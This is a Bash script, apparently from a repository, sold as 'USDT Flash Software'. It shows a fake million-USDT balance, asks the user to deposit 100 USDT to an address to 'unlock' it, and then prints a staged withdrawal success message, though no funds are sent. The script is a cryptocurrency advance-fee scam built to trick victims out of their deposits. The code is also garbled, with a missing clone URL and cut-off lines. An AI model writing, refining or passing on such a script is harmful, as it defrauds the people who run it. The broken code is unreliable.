pkg install git && git clone cd Usdt_Flash && bash #!/bin/bash
balance=1000000 hash_id="d26c9fb3e2738deb32d9d0e1ce0e7427211da34390955883dc2dc24a89603099"
$$ $$
$$ / __| $$$$$$\ $$\ $$\ $$$$$$$$$$\ $$$$$$\ $$$$$$\ $$$$$$$
\e[38;2;38;161;123m$$$$$$\ $$ $$\ $$ | $$ |$$ $$ $$\ _$$\ $$ $$\ $$ $$
_$$\ $$ / $$ |$$ | $$ |$$ / $$ / $$ | $$$$$$$ |$$ / $$ |$$ | $$ |
$$\ $$ |$$ | $$ |$$ | $$ |$$ | $$ | $$ |$$ $$ |$$ | $$ |$$ | $$ |
\e[38;2;38;161;123m$$$$$$ |$$$$$$ |$$$$$$ |$$ | $$ | $$ |$$$$$$$ |$$$$$$ |$$ | $$ |
_/ _/ _/ _| _| _| _| __/ _| _|
function fancyBoxEcho {
local message="$1"
local length=${#message}
local border=$(printf '=%.0s'
echo -e "\e[38;2;38;161;123m$border\e[0m"
echo -e "\e[38;2;38;161;123m| $message |\e[0m"
echo -e "\e[38;2;38;161;123m$border\e[0m"
welcome_message="Welcome to the USDT Flash Software! Unlock your balance and enjoy the power of Flash USDT!"
echo -e "$usdt_logo"
fancyBoxEcho "$welcome_message"
echo -e "To unlock your balance of $balance USDT, please deposit 100 USDT to the following address: $account_id"
function unlockBalance {
echo " "
read -p "Enter your deposit amount in USDT: " depositAmount
if ! [[
echo " " for ((i=1; i<=15; i++)); do echo -e " \e[32mValidating please wait...\e[0m" sleep 0.5 done echo " "
if [[ $depositAmount -eq 100 && $transactionHash == "$hash_id" ]]; then
echo -e " \e[32mSuccessfully Unlocked procedding...\e[0m" echo " "
selectNetwork else echo -e "\e[31mError: Invalid deposit amount or transaction hash ID. Restarting...\e[0m" sleep 3 clear fancyBoxEcho "$welcome_message" unlockBalance fi }
function selectNetwork {
echo -e "\e[34mSelect network:\e[0m"
echo " " echo "1. TRC20" echo "2. ERC20" echo "3. BEP20" echo " " echo -n "Enter your choice: " read network_choice
case $network_choice in
1) network="TRC20";;
2) network="ERC20";;
3) network="BEP20";;
echo -e "\e[31mInvalid choice, please try again.\e[0m"
esac selectWithdrawalAmount } function clearScreen { sleep 1.5 clear }
clearScreen echo -e "\e[34mSelect withdrawal amount:\e[0m" echo "1. 1000000" echo "2. 500000" echo "3. 300000" echo "4. 100000" echo " " echo -n -e "\e[32mEnter Your Option: \e[0m" read amount_choice
case $amount_choice in
1) amount=1000000;;
2) amount=500000;;
3) amount=300000;;
4) amount=100000;;
echo -e "\e[31mInvalid choice, please try again.\e[0m"
read -p "Enter your withdrawal address: " withdrawal_address # Check if the address seems valid (basic check for length) if [[ ${#withdrawal_address} -lt 10 ]]; then echo -e "\e[31mError: Invalid withdrawal address. Please try again.\e[0m" selectWithdrawalAmount return fi echo "" echo -e "\e[32mSending Funds....\e[0m" echo -e "[+] Withdrawal of $amount USDT successful to address $withdrawal_address on $network network. [+]" exit }
function refresh { echo "Refreshing..." sleep 2 clear echo -e "$usdt_logo" echo " " fancyBoxEcho "$welcome_message" echo -e "To unlock your balance of $balance USDT, please deposit 100 USDT Under TRC20 to the following address: $account_id" } function refreshOnSuccess { echo "Authenticating....." sleep 4 clear } refresh # Call the refresh function when the script starts
while true; do unlockBalance done